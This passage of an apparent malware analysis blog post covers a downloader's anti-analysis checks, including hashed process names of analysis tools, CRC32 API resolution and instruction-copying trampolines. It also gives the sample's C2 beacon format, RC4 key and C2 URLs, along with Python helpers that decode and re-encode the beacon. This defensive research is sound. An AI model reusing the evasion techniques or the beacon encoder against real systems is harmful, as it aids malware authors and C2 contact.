<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CF2 cmp eax, 3A51FCA1h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CF7 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CFD cmp eax, 55BEA691h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D02 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D08 cmp eax, 32F5A99Ch</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D0D jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D13 cmp eax, 3351E744h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D18 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D1E cmp eax, 79B90798h ; wireshark.exe</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D23 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D29 cmp eax, 0FD53FE32h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D2E jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D34 cmp eax, 23A97A00h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D39 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D3F cmp eax, 0ADC6152Bh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D44 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D4A cmp eax, 1365FAFEh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D4F jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D55 cmp eax, 98847CD1h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D5A jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D60 cmp eax, 299BC837h ; vmtoolsd.exe</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D65 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D6B cmp eax, 35E8EFEAh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D70 jz loc_401EBF</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D76 cmp eax, 632434B6h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D7B jz loc_401EBF</span></div>
<div class="MsoListParagraphCxSpMiddle">
<br /></div>
<div class="MsoListParagraphCxSpMiddle">
As mentioned earlier, the behavior described under the "A Different
Payload" section is run if it detects any of these processes or
strings.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
If the hash of the volume information (sub_4016ED applied to the output of
GetVolumeInformation) equals 0x20C7DD84, all of the checks above are skipped:</div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C08 call dword ptr [ebp-10h] ; GetVolumeInformation</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C0B lea eax, [ebp-36Ch]</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C11 push eax</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C12 call sub_4016ED</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C17 cmp eax, 20C7DD84h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C1C jz loc_401EB2</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Another anti-analysis technique it uses is resolving API addresses by CRC32
hash rather than importing them by name, so the API names never appear in the file:</div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DBB push 0C13A7AD3h ; RegOpenKeyA</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC0 push esi</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC1 call GetAPIVaFromCrc32</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC6 mov [ebp-34h], eax</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC9 test eax, eax</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DCB jz loc_401EB2</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DD1 push 0B039ADFEh ; RegQueryValueExA</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DD6 push esi</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DD7 call GetAPIVaFromCrc32</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DDC mov [ebp-38h], eax</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DDF test eax, eax</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DE1 jz loc_401EB2</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DE7 push 0A9290135h ; RegCloseKey</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DEC push esi</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DED call GetAPIVaFromCrc32</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DF2 mov [ebp-3Ch], eax</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
A call to the RegOpenKeyA API would look something like this:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E3C push 80000002h</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E41 call dword ptr [ebp-34h]</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
With static analysis alone, it is not easy to see that the API called through
[ebp-34h] is RegOpenKeyA.</div>
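<div class="MsoNormal">
Added example (not code from the post or from the sample): a small Python helper that builds CRC32 lookup tables for candidate API and process names so that constants like the ones in the listings above can be labelled. Which CRC32 parameters and name casing the sample actually uses is an assumption, so several variants are tried, and the candidate name lists are constructed; if the post's constants do not resolve with these variants, the sample's hash differs from standard CRC32 in a way not covered here.</div>

```python
"""Label API/process hash constants from a disassembly listing.

Added example, not the sample's own code. Builds a table of CRC32 values
for candidate names (several parameter/case variants, since the exact
variant used by the sample is an assumption) and looks up constants.
"""


def crc32_reflected(data: bytes, init: int = 0xFFFFFFFF, xorout: int = 0xFFFFFFFF) -> int:
    """Reflected CRC-32 (poly 0xEDB88320) with configurable init/xorout so
    non-standard variants seen in malware can be tried as well."""
    crc = init
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return (crc ^ xorout) & 0xFFFFFFFF


# (init, xorout) pairs; "crc32" is the standard zlib/PKZIP definition.
VARIANTS = {
    "crc32": (0xFFFFFFFF, 0xFFFFFFFF),
    "crc32/no-xorout": (0xFFFFFFFF, 0),
    "crc32/init0": (0, 0),
    "crc32/init0-xorout": (0, 0xFFFFFFFF),
}
CASES = {"as-is": lambda s: s, "lower": str.lower, "upper": str.upper}


def build_table(names, xor_key: int = 0) -> dict:
    """Map every (case, variant) hash of each name to (name, case, variant).

    xor_key models the 'xor eax, 0E17176Fh' applied before the process-name
    compares: table keys are hash ^ xor_key, so raw constants can be looked up.
    """
    table = {}
    for name in names:
        for case, fn in CASES.items():
            data = fn(name).encode("ascii")
            for variant, (init, xorout) in VARIANTS.items():
                h = crc32_reflected(data, init, xorout) ^ xor_key
                table.setdefault(h, []).append((name, case, variant))
    return table


def resolve(constants, table: dict) -> dict:
    """Return {constant: [matches]}; an empty list means unresolved."""
    return {c & 0xFFFFFFFF: table.get(c & 0xFFFFFFFF, []) for c in constants}


# Constants as shown in the listings of the post.
API_CONSTANTS = [0xC13A7AD3, 0xB039ADFE, 0xA9290135]   # pushed before GetAPIVaFromCrc32
PROCESS_CONSTANTS = [0x79B90798, 0x299BC837]            # commented wireshark.exe / vmtoolsd.exe
PROCESS_XOR = 0x0E17176F                                # xor eax, 0E17176Fh

# Constructed candidate lists; a real run would feed whole export tables
# and a long list of analysis-tool process names.
API_CANDIDATES = ["RegOpenKeyA", "RegQueryValueExA", "RegCloseKey",
                  "GetVolumeInformationA", "SetFileAttributesW"]
PROCESS_CANDIDATES = ["wireshark.exe", "vmtoolsd.exe", "VBoxService.exe",
                      "procmon.exe", "ollydbg.exe"]

if __name__ == "__main__":
    for label, consts, cands, key in (
        ("API", API_CONSTANTS, API_CANDIDATES, 0),
        ("process", PROCESS_CONSTANTS, PROCESS_CANDIDATES, PROCESS_XOR),
    ):
        for const, hits in resolve(consts, build_table(cands, key)).items():
            print(f"{label} {const:08X}: {hits or 'unresolved with these variants'}")
```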
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Yet another anti-analysis technique it uses is a second way of calling its
APIs. Whereas in the previous example the API address is stored directly in
<span style="font-size: 8.0pt; line-height: 115%;">[ebp-34h]</span>, here it
is reached through several layers of indirection in memory.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CCC: FF25C061FA7F jmp d,[7FFA61C0]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CD2: FF25BC61FA7F jmp d,[7FFA61BC]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CD8: FF25B861FA7F jmp d,[7FFA61B8]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CDE: FF25B461FA7F jmp d,[7FFA61B4]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CE4: FF25A461FA7F jmp d,[7FFA61A4]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CEA: FF25A061FA7F jmp d,[7FFA61A0]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CF0: FF259C61FA7F jmp d,[7FFA619C]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CF6: FF259861FA7F jmp d,[7FFA6198]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<br /></div>
<div class="MsoNormal">
Dumping the memory at address 0x7FFA61BC leads us to another address,
0x7FF90020. Notice that consecutive dwords in that dump differ by 0x10:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9XOP_mKpd5JHfTmJe0J4reNu3setUNaIlk4ZewzznrI7Z_1VzvDwTsIeU-CGYH6q8pm2QJhPuyFrlE2rj5QbV30pC2vuKrYQNmH6ZW09u0rsR0bqbVknj6FUrkSGCruGpdjV37GMKhG7C/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9XOP_mKpd5JHfTmJe0J4reNu3setUNaIlk4ZewzznrI7Z_1VzvDwTsIeU-CGYH6q8pm2QJhPuyFrlE2rj5QbV30pC2vuKrYQNmH6ZW09u0rsR0bqbVknj6FUrkSGCruGpdjV37GMKhG7C/s1600/2.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
At address 0x7FF90020, the instruction would look like this:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_wKd6W-lETX8ZtFYfxydSUps_bpFqtaEG-cN_bpiZEX-kO4ki2RxOfycmsMRGbNhxtR_HRzmqK1loC30JljYoMFgAokG04p_6XX3aXpwgQ3sctmBjG0w8MyDhizIcDEgq95RjJe-uIT5y/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_wKd6W-lETX8ZtFYfxydSUps_bpFqtaEG-cN_bpiZEX-kO4ki2RxOfycmsMRGbNhxtR_HRzmqK1loC30JljYoMFgAokG04p_6XX3aXpwgQ3sctmBjG0w8MyDhizIcDEgq95RjJe-uIT5y/s1600/3.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9rUXb6S9MFvAJkWyj91MHMby4qQlvWH2UYB8X84xJXCfuOQOqAwwFz6osPC47urR1dT02F1kH87RlP-urwf6hW6ycMsgjVPzgdyye-CGxLGKG9zvS8iuCZXh51OgekAr8KJpk_ggimSxF/s1600/4.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9rUXb6S9MFvAJkWyj91MHMby4qQlvWH2UYB8X84xJXCfuOQOqAwwFz6osPC47urR1dT02F1kH87RlP-urwf6hW6ycMsgjVPzgdyye-CGxLGKG9zvS8iuCZXh51OgekAr8KJpk_ggimSxF/s1600/4.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The first instruction, <span style="font-size: 8pt; line-height: 115%;">MOV EDI,EDI</span>, is actually a copy of SetFileAttributesW's
first instruction, and the JMP goes to the instruction that follows it inside
SetFileAttributesW. See the dump at 0x7C8314DD:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixM_L-4Ho1ImL1O6py7v0EozL9STSBy-jPKkNK-EhVRXnn_iHa70or0_tu6YsKdXFIzkGdPAuX3ZWZsdn6p_SBueBfn6j3gbmpHbHINTNRDaXT9qm3Ci5imqQVjHWTnznIWMd4P5D68ado/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixM_L-4Ho1ImL1O6py7v0EozL9STSBy-jPKkNK-EhVRXnn_iHa70or0_tu6YsKdXFIzkGdPAuX3ZWZsdn6p_SBueBfn6j3gbmpHbHINTNRDaXT9qm3Ci5imqQVjHWTnznIWMd4P5D68ado/s1600/5.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Some debuggers only map an API name to its starting address. Because the jump
lands past the first instruction, the debugger in this case could not label the
call with the API's name. This is a somewhat sophisticated anti-analysis technique:
to copy a whole first instruction of arbitrary length, the malware needs a
built-in disassembler (more on this in Appendix A).</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: left;">
Additional dump at address 0x77F9000 (in increments of 0x10, one copied
instruction is stored, followed by an E9 jump):</div>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4hj_GAEhfYg-JV0aUSwWtXFSeFcJunbBbfBnw51YiPOcn0jP_mnkqpMGi9FFzaHsSOwoCpv3eGbLDgRyeik4nZICXn4KL13Fx4NrjjkTzae-o5uqX2KTUCCc7J0_rFEgFqrOp-GIW_Tt/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4hj_GAEhfYg-JV0aUSwWtXFSeFcJunbBbfBnw51YiPOcn0jP_mnkqpMGi9FFzaHsSOwoCpv3eGbLDgRyeik4nZICXn4KL13Fx4NrjjkTzae-o5uqX2KTUCCc7J0_rFEgFqrOp-GIW_Tt/s1600/6.png" /></a></div>
<div class="MsoNormal" style="text-align: left;">
For the downloader part, the malware also authenticates the data returned by
the server: it expects the response to match a hash embedded in the code, and
it only downloads the next component if that check succeeds.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Network Activity<o:p></o:p></b></div>
<div class="MsoNormal">
It assembles a string with the following format:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">id:%lu|bid:%lu|bv:%lu|os:%lu|la:%lu|rg:%lu<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
An example would be: <o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">"id:1957944140|bid:2100|bv:120|os:849|la:31191969|rg:1"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It encrypts the string with RC4 using the key <span style="font-size: 9.0pt; line-height: 115%;">b8d4b5527da0f28c47cd82d86557d4dc</span>
and encodes the ciphertext using Base64. The encoded string is sent via HTTP
POST requests to the following URLs:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://37.139.47.56/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://62.76.187.171/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://85.143.166.119/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
This is illustrated by the following packet capture:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NKqEPi2lXIS6Ih3g1QsAliZIS5vCfVnsyCPBzZ1FQ37jqTKTmzgd_N9wVVajrPZSY7gwnCq53yorW-oQ-ckLjRbwO1kDp8NlhfnjbserlxAbqcOAnFHdn6LxF51udp4bqQGqB-rYfBtL/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NKqEPi2lXIS6Ih3g1QsAliZIS5vCfVnsyCPBzZ1FQ37jqTKTmzgd_N9wVVajrPZSY7gwnCq53yorW-oQ-ckLjRbwO1kDp8NlhfnjbserlxAbqcOAnFHdn6LxF51udp4bqQGqB-rYfBtL/s1600/7.png" height="446" width="640" /></a></div>
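<div class="MsoNormal">
Added example (not the sample's own code): a Python decoder for the beacon format and the RC4/Base64 encoding described above, so a captured POST body can be turned back into its id/bid/bv/os/la/rg fields, and a given set of fields into the body one would expect to see in a capture. It assumes the RC4 key is the 32-character ASCII string quoted above; if the sample uses the 16 raw bytes instead, pass bytes.fromhex(...) as the key. The sample bodies are constructed.</div>

```python
"""Decode and re-encode the RC4 + Base64 beacon described in the post.

Added example, not the sample's own code. Assumption: the RC4 key is the
32-character ASCII string quoted in the post (use bytes.fromhex(...) if
the sample turns out to use the raw 16 bytes).
"""
import base64

RC4_KEY = b"b8d4b5527da0f28c47cd82d86557d4dc"          # key as quoted (ASCII form assumed)
BEACON_FIELDS = ("id", "bid", "bv", "os", "la", "rg")  # id:%lu|bid:%lu|bv:%lu|os:%lu|la:%lu|rg:%lu


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_beacon(fields: dict) -> str:
    """Format the fields exactly as the sample's format string does."""
    return "|".join(f"{name}:{int(fields[name])}" for name in BEACON_FIELDS)


def parse_beacon(text: str) -> dict:
    """Strict inverse of build_beacon; raises ValueError on anything else."""
    pairs = [part.split(":", 1) for part in text.split("|")]
    if any(len(p) != 2 or not p[1].isdigit() for p in pairs):
        raise ValueError("not a beacon string")
    if tuple(name for name, _ in pairs) != BEACON_FIELDS:
        raise ValueError("unexpected field set or order")
    return {name: int(value) for name, value in pairs}


def encode_beacon(fields: dict, key: bytes = RC4_KEY) -> str:
    """Fields -> plaintext -> RC4 -> Base64, i.e. the body the sample would POST."""
    return base64.b64encode(rc4(key, build_beacon(fields).encode("ascii"))).decode("ascii")


def decode_beacon(body: str, key: bytes = RC4_KEY) -> dict:
    """Base64-decode, RC4-decrypt and parse one POST body; ValueError if not a beacon."""
    plain = rc4(key, base64.b64decode(body, validate=True))
    return parse_beacon(plain.decode("ascii"))


def triage_bodies(bodies, key: bytes = RC4_KEY) -> list:
    """Return (body, fields-or-None) per captured POST body, for bulk review of a pcap."""
    results = []
    for body in bodies:
        try:
            results.append((body, decode_beacon(body, key)))
        except ValueError:    # also covers binascii.Error and UnicodeDecodeError
            results.append((body, None))
    return results


# Constructed sample: the field values quoted in the post, plus one unrelated body.
SAMPLE_FIELDS = {"id": 1957944140, "bid": 2100, "bv": 120, "os": 849, "la": 31191969, "rg": 1}

if __name__ == "__main__":
    body = encode_beacon(SAMPLE_FIELDS)
    print("POST body:", body)
    for raw, fields in triage_bodies([body, "aGVsbG8gd29ybGQ="]):
        print(raw[:24], "->", fields)
```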
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Appendix A. Disassembler</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal">
Searching Google for parts of the following code shows that it is a
disassembler routine:</div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040101F cmp word ptr [esi-1], 20CDh</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401025 jnz short loc_401031</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401027 inc esi</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401028 lodsd</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401029 jmp loc_40112F</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E ; ---------------------------------------------------------------------------</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E loc_40102E: ; CODE XREF: sub_401000+1Dj</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E lodsb</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102F inc ah</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401031</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401031 loc_401031: ; CODE XREF: sub_401000+25j</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401031 shr eax, 1</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401033 mov al, ss:byte_401147[ebp+eax]</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040103A jb short loc_40103F</span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040103C shr eax, 4</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
One of the search hits is worth noting: it leads to a
disassembler called <span style="background: white; color: #333333; font-family: Consolas; font-size: 9.0pt; line-height: 115%;">Catchy32 v1.6 - Length Disassembler
Engine 32bit</span>, which is part of the Carberp bootkit source:</div>
<div class="MsoNormal">
<a href="https://github.com/hzeroo/Carberp/blob/master/source%20-%20absource/pro/all%20source/bootkit.old/BKGen/i386/Catchy32.inc">https://github.com/hzeroo/Carberp/blob/master/source%20-%20absource/pro/all%20source/bootkit.old/BKGen/i386/Catchy32.inc</a></div>
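<div class="MsoNormal">
The identification above relied on searching for fragments of the routine by hand. A listing searches and compares more reliably once the addresses, auto-generated names and xref comments are stripped, leaving only the instruction sequence. The Python below is an added example (not code from this post, nor from the Catchy32 or Carberp sources): it normalises the Appendix A listing, extracts the mnemonic sequence, hashes it as a relocation-independent signature and scores similarity against another normalised listing. The regular expressions encode assumptions about IDA's listing conventions (segment:address prefix, loc_/sub_/byte_ names).</div>

```python
"""Canonicalise an IDA-style listing for code-reuse lookups.

Added example, not code from the post.  LISTING is the Appendix A fragment
copied from the post; everything else is assumption about IDA's output format.
"""
import hashlib
import re
from difflib import SequenceMatcher

LISTING = """\
_1961:0040101F cmp word ptr [esi-1], 20CDh
_1961:00401025 jnz short loc_401031
_1961:00401027 inc esi
_1961:00401028 lodsd
_1961:00401029 jmp loc_40112F
_1961:0040102E ; ---------------------------------------------------------------------------
_1961:0040102E
_1961:0040102E loc_40102E: ; CODE XREF: sub_401000+1Dj
_1961:0040102E lodsb
_1961:0040102F inc ah
_1961:00401031
_1961:00401031 loc_401031: ; CODE XREF: sub_401000+25j
_1961:00401031 shr eax, 1
_1961:00401033 mov al, ss:byte_401147[ebp+eax]
_1961:0040103A jb short loc_40103F
_1961:0040103C shr eax, 4
"""

# "segment:address " prefix IDA puts in front of every listing line (assumed format)
PREFIX_RE = re.compile(r"^[A-Za-z_0-9.]+:[0-9A-Fa-f]{8}\s*")
# auto-generated names whose hex suffix is an address and therefore build-specific
AUTONAME_RE = re.compile(r"\b(loc|sub|byte|word|dword|off|unk)_[0-9A-Fa-f]+\b")
# a bare "label:" line (after the xref comment has been stripped)
LABEL_RE = re.compile(r"^[A-Za-z_][A-Za-z_0-9]*:$")


def normalise(listing):
    """Return (instructions, labels).

    instructions: address-free instruction strings with auto-names replaced by
                  "@loc", "@byte", ... so relocation and renaming do not matter.
    labels:       names of the labels defined inside the fragment.
    """
    instructions, labels = [], []
    for raw in listing.splitlines():
        line = PREFIX_RE.sub("", raw, count=1)
        line = line.split(";", 1)[0].strip()   # drop separators, comments, xrefs
        if not line:
            continue
        if LABEL_RE.match(line):
            labels.append(line[:-1])
            continue
        line = AUTONAME_RE.sub(lambda m: "@" + m.group(1), line)
        line = re.sub(r"\s+", " ", line)
        instructions.append(line)
    return instructions, labels


def mnemonics(instructions):
    """Mnemonic of each normalised instruction, operands dropped."""
    return [ins.split(" ", 1)[0] for ins in instructions]


def signature(instructions):
    """SHA-256 over the mnemonic sequence: a cheap, relocation-independent tag."""
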